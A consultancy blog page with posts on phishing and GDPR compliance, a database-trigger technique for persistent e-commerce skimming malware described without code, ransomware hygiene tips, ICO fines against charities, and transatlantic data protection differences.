SRM Blog

Phishing and GDPR compliance

By Paul Brennecker, Principal Consultant, CISM | PCI QSA | PCI PFI | PCIP

There is a saying that a chain is only as strong as its weakest link. This, unfortunately, is true. When a company manages and handles sensitive customer data it does not matter how robust the security measures if one unsuspecting employee inadvertently opens up the system to hackers. Yet the danger this presents is sometimes underestimated.

Failure to protect customer data adequately already results in serious sanctions and fines under the current Data Protection Act (DPA) legislation. In 2016 twenty-one fines were levied in the UK totalling £2.1 million. When the General Data Protection Regulation (GDPR) comes into effect next May, however, things will become even tougher. With a theoretical maximum fine of up to £500,000 or 4 per cent of global turnover, these sanctions alone have the potential to bring a company down.

A common data security breach is through what is known as phishing. Defined as an attempt to obtain sensitive information such as usernames, passwords, and credit card details for malicious reasons, by disguising as a trustworthy entity in an electronic (or telephone) communication. They mislead unsuspecting individuals into giving hackers a foothold in a corporate system.

Typically, they will appear to come from a popular, well-known or reputable-sounding company. Microsoft, LInkedin and Google Drive have been subject to their names being hijacked for fraudulent purposes. Then the cybercriminal will set out a fictitious issue with a user account, threaten that action will be taken if it is not remedied and provide a link to click. At first glance the corporate branding, email address and link will look genuine. This type of phishing email is indiscriminate in its approach and is out to catch any unwary soul who takes the bait.

A more worrying trend is the ‘Spear Phishing’ attack, where a specific individual or number of individuals is targeted within an organisation. These people are often in positions where they will have access to company sensitive information or records, such as the finance or marketing teams. With a little research, the source of the spear phishing attack can ascertain the name of a senior member of staff within the company and trick the recipients into believing it has originated from the boss. These emails will be positioned to members of the team further down the chain in order to gain further information or even to directly ask for payments to be made. Once you understand the anatomy of a spear phishing attack, you can see why having an organisational chart and email book becomes invaluable data to the attacked. This may have been gathered as part of the initial phishing attack, through the use of malware injected onto email or active directory servers.

So – If an unsolicited email of any type appears, it should not be opened. If it is, it is worth checking the spelling and grammar. Unlike professional companies who use copy editors to check their content, cybercriminals are not known for written English. Links should also be checked.  By hovering a mouse over the link (while not clicking through) an entirely different web address may appear. All requests which lead to requests for sensitive account information should be treated as phishing attempts. Genuine companies never request password or bank account information online. Yet, if an employee has got to this stage it is likely that a malicious attack will already be underway.

Training staff how to recognise and deal with suspicious emails is just one element of a robust information security plan. SRM’s specialist consultants have the experience and expertise to manage all elements of information security from employee training to forensic investigations; from penetration testing to preparing for GDPR compliance. To discuss any aspect of information security please contact us.

Emerging Trend: Persistent JavaScript Ecommerce Malware

Our analysts report another trend that Administrators should be aware of.  This is a JavaScript-based eCommerce malware that enables the malware to re-infect websites automatically upon incomplete removal.  It has been identified as a new technique being used by cyber criminals.

This type of malware obtains its persistence by modifying databases to force the injection of a malicious JavaScript file into an eCommerce webpage. By targeting databases, the malware therefore becomes resilient to normal removal attempts. Cyber criminals have recently used this technique to target eCommerce merchants by successfully injecting the JavaScript code into a database field of a merchants website and compromising payment card data.

This malware reinfection method can be used on any eCommerce platform that uses database fields to populate content on the shopping cart webpage. Reinfection of websites can be done with the following processes:
1. A database trigger is added to the order table, which injects the malicious JavaScript link into the website template fields.
2. The trigger is executed every time a new order is made.

Scanning for malicious code in HTML files is not sufficient enough to detect this malware alone. Analysis of the database is required to ensure a proper clean-up of JavaScript eCommerce malware is conducted.
Regular scanning of webservers for malware is one recommended mitigation measure eCommerce websites can take to identify security vulnerabilities. Another recommended best practice is to check for malicious database triggers on eCommerce websites and subsequently remove these.

If you are in doubt, contact the SRM  team who can arrange to run a check for you!

Managing Director of SRM, Tom F is a regular contributor to the SRM blog.

Ransomware – Could it be you?….

Complacency has always been the enemy of safety; in today’s world, we are all vulnerable!

The digital (cyber) environment may sometimes be opaque and difficult to understand, but it is a contested environment. If we seek to operate within it, and exploit its advantages, we must actively engage or expect to become a victim.

As I write a number of organisations worldwide, are reeling under the hammer of what appears to be a thoroughly industrialised Cyber Attack. Many of these affected organisations have (or claim) a reputation for strong governance. There is no-one, reading this, who doesn’t have actions that they should have taken or should be taking now.

Whilst it is tempting to view this sort of event as spectators, anyone reading this is unlikely to be invulnerable, whether we are part of an organisation or an individual. There are steps we should all be taking to reduce risk to ourselves or our organisations. We ignore these responsibilities at our peril.

Those who are responsible for the safety of organisations will have already taken actions to ensure that they are as safe as possible. This is part of baseline governance needed in today’s world and no organisation can claim to be competently run if it doesn’t have an effective Information or Cyber Security Management System. If you have one – you will probably know about it!

If you haven’t – then now is a good time to start – and if necessary get in touch with someone who can help you. (if you can’t think of anyone specific or are worried, is a good place to start!) There are a number of excellent schemes and established practices that you can use to raise the bar for attackers. If you have done nothing else yet – at least look at the Cyber Essentials Scheme as a first step.

If you don’t know who is responsible in your company – check – it could be you!

As individuals, however, we are still potential victims of attacks like this, but if we practice basic Cyber Hygiene we dramatically reduce the risks to ourselves and those around us.

Make sure our defences are strong:

Ensure our Anti Virus (even on a mac!), firewalls and software are all up to date and switched on.
Scan our systems with Anti Virus, and do this regularly when attacks are going on.
Stay alert to any suspicious emails, messages and don’t open anything suspicious. If someone sends you something suspicious. Contact them separately to check it is legitimate.
Check that we are using difficult to guess passwords, and that we are not exposing the password protecting our “crown jewels” on untrusted internet sites or unprotected devices.
Check our bank and card statements – Regularly!
Think it through from an attacker’s perspective.

Make sure we are resilient:

Ensure our information is backed and kept somewhere where it isn’t connected to the internet or our main system (e.g. a CD or a Backpack Drive).
Ensure we keep all backup data safe – and if possible encrypted. Ideally under lock and key.
Ensure that any critical information is held safely so that it will be available in the event that our main system is unavailable.

Make sure we know what to do if we are compromised:

Write down a simple plan – stick it on the fridge or the filing cabinet – somewhere we can find it!
Don’t pay ransoms – we shouldn’t need to!
Know who we are going to contact for further advice in emergency.

Don’t Assume – Check that you are as safe as you think you are. Do this periodically and when the risk rises:

Check our Backups are being taken (and that your drive is not full). Check that we can restore them and that they are not corrupted.
Check that you can access your critical data and files if your main system is down.
If you don’t know how to do any of this – learn now – these are basic survival skills! If you have friends or family members who may not be able to do this – it may be worth contacting them to check they are not exposing themselves inadvertently.

Whether we are acting as individuals or are responsible for the safety of an organisation, this is no longer something for someone else to do – we all have a part to play, and must play it to the best of our ability.

Managing Director of SRM, Tom F is a regular contributor to the SRM blog.

No breach too small – the ICO takes action against charities

In December 2016 the Information Commissioner’s Office (ICO) fined a historical society £400 after a laptop containing personal data was stolen while a member of staff was working away from the office. The data was not encrypted and contained details of donors and the artefacts they had gifted. The ICO investigation found ‘the organisation had no policies or procedures around homeworking, encryption and mobile devices which resulted in a breach of data protection law’. So, it is not just big business that needs to comply with data protection law. It applies to everyone, regardless of size or motive. In fact, some well-loved charities ran into trouble with the ICO this year.

In April 2017 an ICO report revealed that thirteen charities have been fined for non-compliance. The ICO is the independent authority set up to ‘uphold information rights in the public interest’. They have the power to take action when data rules are breached, regardless of scale.

Between 2015 and 2017 the ICO carried out an investigation into the practices of charity fundraising. The thirteen charities which were fined included Battersea Dogs’ and Cats’ Home, Cancer Research UK, Great Ormond Street Hospital, Macmillan Cancer Support, Oxfam, NSPCC, The Royal British Legion and Guide Dogs for the Blind Association. Fines ranged from £6,000 – £18,000 depending on the non-compliance identified. The breaches fell into three distinct areas:

Finding information about you, that you didn’t provide. The ICO asserts that the individual has the right to choose what personal information is provided. The practice of using external companies to find missing information or update out of date information is not permitted. Battersea Dogs’ Home received a £9,000 for using this approach in 740,181 cases between 2011 and 2015.

Sharing your details with other charities, no matter what the cause. It is common for some charities to exchange donor information. The practice of sharing donor information is not illegal but using an external organisation and not knowing with which other charities it is being shared is. Cancer Support UK was fined £16,000 for failing to follow data protection rules.

Ranking based on wealth. Some charities profile their donors based on wealth. External companies can also identify donors they believe charities should target because they are most likely to leave money in their wills. It is called legacy profiling. The Guide Dogs for the Blind Association was fined £15,000 for this and for sourcing information they did not have permission to access.

The important message is that it does not matter what size the organisation or whatever its status, the same rules apply. It is also worth noting that the rules regarding personal data will become significantly stricter when the General Data Protection Regulation (GDPR) becomes UK law in May 2018. To find out about your obligations and how to comply, including protecting personal information, see the ICO’s Data Protection Self Assessment Toolkit.

Data protection – the gap widens across the Atlantic

Data protection is a global issue. Yet it is being approached in very different ways on either side of the Atlantic. While Europe and Britain will embrace the more stringent rules of the General Data Protection (GDPR) regulation from May 2018, the situation in the USA is going the other way. On 3rd April President Trump signed a new law making more personal data legally available. Overturning the previous legislation, ISPs are now able to access and use all but the most sensitive personal information. Much of this personal data is likely to be harvested and sold to digital advertisers.

While the global super power Google already grows its business through targeted online advertising, this will open up the practice in the US to a host of other players in the ISP market. Its advocates say this availability of data helps advertisers to target consumers more effectively thereby helping them to make better decisions. Its detractors see it very differently.

Whatever your view, Personal Information Management Services (PIMS) are already huge revenue generators and not just in the United States. A study estimates the value of the UK PIMS market to be currently worth £16.5 billion. But from this moment on, the paths diverge and when it comes to the future of personal data protection, it appears that the differentiator will be regional legislation.

The change in law in the US, with its permissive approach to personal data, will open up the PIMS market and along with it many associated problems. It certainly seems likely that this will create a need for privacy-enhancing tools and services. In Europe, on the other hand, the legislative market under the GDPR might drive online advertising businesses to invest in new models which create value from mining personal data in legal ways. There is little that can be done to prevent opportunism in the world of PIMS and digital advertising, but the American model is fraught with problems and risks, both financial and on a moral basis. We in the UK must be grateful for the very different approach mandated by GDPR.

When GDPR comes into effect, UK companies will be legally obliged to observe new procedures and take even greater responsibility for how they collect, share, and use consumers’ data. Some businesses will complain that the new regulation is burdensome and bureaucratic but they are wrong. Those who shirk it will certainly feel some pain as enforcement will be strict and fines extremely severe. But many will embrace it as an opportunity; as a competitive differentiator. If in any doubt, the complainers will only have to keep an eye on how the permissive data protection laws impact across the Atlantic.

SRM has operated in the data security environment for many years. With a wide range of knowledge and practical experience, our consultants are ready to help you understand the risks to your information and manage them effectively. Our specialist team provides a full portfolio of services which include data protection. We can assist companies to be in a more ready state for GDPR compliance when it comes into effect next year.

GDPR – The General Data Protection Regulation

The uncertainty of Brexit, the certainty of GDPR and the responsibilities of the CISO


If Brexit means Brexit, what does GDPR mean?